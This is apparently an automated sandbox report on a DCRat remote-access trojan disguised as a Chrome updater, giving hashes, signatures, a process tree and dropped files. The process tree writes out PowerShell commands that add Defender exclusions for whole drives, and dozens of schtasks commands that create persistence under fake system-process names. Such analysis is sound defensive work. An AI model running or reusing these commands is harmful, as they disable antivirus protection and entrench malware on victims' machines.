Analysis

  • max time kernel
    144s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-06-2023 09:21

General

  • Target

    a1d05206520518a47f710e7197bbc336.exe

  • Size

    1.5MB

  • MD5

    a1d05206520518a47f710e7197bbc336

  • SHA1

    270ac60027ac01b78139bec3a6fe54f702c4fe96

  • SHA256

    374eba5495779dc24974bb881e0c3f298861a91d88d710da4f684bf8a2a01fe6

  • SHA512

    6164910de359dd7f9ad12e75c1ea170ff5fb313598da249c12888a100cd01e3888bbea25240a7924ea825147a7979b0b941e9d8916a322dbb3846c077959921a

  • SSDEEP

    24576:YW3QhwWwORHtx07i/85O8q9Fx7hFsf1gj7xN9sKrogXMAGqo3K6L29ufIOT0Gj:YW3QNRH/07imOljZhFsf1s9ZkgXZkKxC

Score
10/10

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Process spawned unexpected child process 42 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 10 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Program Files directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 42 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a1d05206520518a47f710e7197bbc336.exe
    "C:\Users\Admin\AppData\Local\Temp\a1d05206520518a47f710e7197bbc336.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\GoogleChromeUpdate\KillDuplicate.cmd" "C:\Users\Admin\AppData\Local\Temp\GoogleChromeUpdate" "a1d05206520518a47f710e7197bbc336.exe""
      2⤵
        PID:1300
      • C:\Users\Admin\AppData\Local\Temp\GoogleChromeUpdate\GoogleChromeUpdate.exe
        "C:\Users\Admin\AppData\Local\Temp\GoogleChromeUpdate\GoogleChromeUpdate.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4736
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\01JDjn9an.vbe"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2904
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\ProgramData\vyRlj1SkqrfRYAG7.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:880
            • C:\ProgramData\componentsessioncrt.exe
              "C:\ProgramData\componentsessioncrt.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3156
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1636
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3548
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4192
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2968
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3040
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3388
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5008
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5092
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3848
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4520
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3124
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mSSrp8dhrf.bat"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3776
                • C:\Windows\system32\w32tm.exe
                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  7⤵
                    PID:936
                  • C:\ProgramData\componentsessioncrt.exe
                    "C:\ProgramData\componentsessioncrt.exe"
                    7⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4132
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1936
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ybAbNnqa15.bat"
                      8⤵
                        PID:1048
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          9⤵
                            PID:1964
                          • C:\odt\lsass.exe
                            "C:\odt\lsass.exe"
                            9⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3784
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2116
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1780
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4688
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1740
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          8⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2348
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3576
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          8⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1172
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          8⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2940
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
                          8⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2228
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3064
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          8⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2256
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\TrustedInstaller.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2360
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\TrustedInstaller.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:780
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\TrustedInstaller.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2496
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\conhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1656
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\conhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3712
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\conhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:692
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files\7-Zip\Lang\RuntimeBroker.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4464
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3920
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\7-Zip\Lang\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3340
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "componentsessioncrtc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\componentsessioncrt.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:920
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "componentsessioncrt" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\componentsessioncrt.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1172
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "componentsessioncrtc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\componentsessioncrt.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3692
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4812
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3660
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4056
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2692
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:916
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3680
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\csrss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3496
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2732
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2132
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Favorites\winlogon.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:5084
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default\Favorites\winlogon.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4784
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Favorites\winlogon.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1004
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\odt\spoolsv.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:848
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4500
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1368
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2988
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:4908
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3640
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\odt\lsass.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:756
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3340
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2300
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\odt\System.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            • Suspicious behavior: EnumeratesProcesses
            PID:1636
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\odt\System.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1852
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\odt\System.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3244
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Users\Public\taskhostw.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1836
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2208
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2628
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Media Player\Skins\MoUsoCoreWorker.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:1688
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Skins\MoUsoCoreWorker.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:2456
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Media Player\Skins\MoUsoCoreWorker.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Creates scheduled task(s)
            PID:3748

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Discovery

          Query Registry

          2
          T1012

          System Information Discovery

          2
          T1082

          Command and Control

          Web Service

          1
          T1102

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files (x86)\Internet Explorer\conhost.exe
            Filesize

            983KB

            MD5

            5defd0000aa1bf0805c8d2e2fc3ed20d

            SHA1

            e7a366a7a834e2ab3cabc3dd412f065c636b4efb

            SHA256

            fc11e2bbd6d3e8dce36393b3b00504ce8ed994e0498fffee0ce42d838ae51888

            SHA512

            e387cb219aec67da2eab62d7f091b8cad5b87cd971477f50c80ba263d009bc862ff272611a572de5cf51a27119e5ad0fae33cb9a4953b91768ed9252ebe84a7d

          • C:\ProgramData\01JDjn9an.vbe
            Filesize

            205B

            MD5

            76db147c9e20a89ea972166168a4b9ba

            SHA1

            475c26be4c2e8bc8ef0fd4bcc469e92e64f332ae

            SHA256

            5699049e3e55284b66a98cdbce5b4c36c3ce7396bdf60632c544ce390bad6dd0

            SHA512

            e32b9bfa54d9c71d1b17ea71ee5846a9f2220b77ad23045f5662c52324037e99cab253676d8d8e75bea44e2cf824b1ea3cc92ee84cced7866292eb73d51f77eb

          • C:\ProgramData\componentsessioncrt.exe
            Filesize

            983KB

            MD5

            5defd0000aa1bf0805c8d2e2fc3ed20d

            SHA1

            e7a366a7a834e2ab3cabc3dd412f065c636b4efb

            SHA256

            fc11e2bbd6d3e8dce36393b3b00504ce8ed994e0498fffee0ce42d838ae51888

            SHA512

            e387cb219aec67da2eab62d7f091b8cad5b87cd971477f50c80ba263d009bc862ff272611a572de5cf51a27119e5ad0fae33cb9a4953b91768ed9252ebe84a7d

          • C:\ProgramData\componentsessioncrt.exe
            Filesize

            983KB

            MD5

            5defd0000aa1bf0805c8d2e2fc3ed20d

            SHA1

            e7a366a7a834e2ab3cabc3dd412f065c636b4efb

            SHA256

            fc11e2bbd6d3e8dce36393b3b00504ce8ed994e0498fffee0ce42d838ae51888

            SHA512

            e387cb219aec67da2eab62d7f091b8cad5b87cd971477f50c80ba263d009bc862ff272611a572de5cf51a27119e5ad0fae33cb9a4953b91768ed9252ebe84a7d

          • C:\ProgramData\componentsessioncrt.exe
            Filesize

            983KB

            MD5

            5defd0000aa1bf0805c8d2e2fc3ed20d

            SHA1

            e7a366a7a834e2ab3cabc3dd412f065c636b4efb

            SHA256

            fc11e2bbd6d3e8dce36393b3b00504ce8ed994e0498fffee0ce42d838ae51888

            SHA512

            e387cb219aec67da2eab62d7f091b8cad5b87cd971477f50c80ba263d009bc862ff272611a572de5cf51a27119e5ad0fae33cb9a4953b91768ed9252ebe84a7d

          • C:\ProgramData\vyRlj1SkqrfRYAG7.bat
            Filesize

            40B

            MD5

            89947106df373d55eec5d73e11eac3e1

            SHA1

            788822f62913626780934e0bae6239b2f945dc61

            SHA256

            b30caba090d08a4bd296166f4833c90e5c0057d1bd04e0d50592319bccaf4637

            SHA512

            cc4d1a9b2fc1596526e99488fffde8d39c263b5551c5c5696dacbe3065cf44f5a94d77a34821cfe10b53e0e9202c3328850bd53bc6e0d4aca3ff99d729e33168

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\componentsessioncrt.exe.log
            Filesize

            1KB

            MD5

            7f3c0ae41f0d9ae10a8985a2c327b8fb

            SHA1

            d58622bf6b5071beacf3b35bb505bde2000983e3

            SHA256

            519fceae4d0dd4d09edd1b81bcdfa8aeab4b59eee77a4cd4b6295ce8e591a900

            SHA512

            8a8fd17eef071f86e672cba0d8fc2cfed6118aff816100b9d7c06eb96443c04c04bc5692259c8d7ecb1563e877921939c61726605af4f969e3f586f0913ed125

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cadef9abd087803c630df65264a6c81c

            SHA1

            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

            SHA256

            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

            SHA512

            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cadef9abd087803c630df65264a6c81c

            SHA1

            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

            SHA256

            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

            SHA512

            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cadef9abd087803c630df65264a6c81c

            SHA1

            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

            SHA256

            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

            SHA512

            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cadef9abd087803c630df65264a6c81c

            SHA1

            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

            SHA256

            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

            SHA512

            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cadef9abd087803c630df65264a6c81c

            SHA1

            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

            SHA256

            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

            SHA512

            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            e448fe0d240184c6597a31d3be2ced58

            SHA1

            372b8d8c19246d3e38cd3ba123cc0f56070f03cd

            SHA256

            c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

            SHA512

            0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            bd5940f08d0be56e65e5f2aaf47c538e

            SHA1

            d7e31b87866e5e383ab5499da64aba50f03e8443

            SHA256

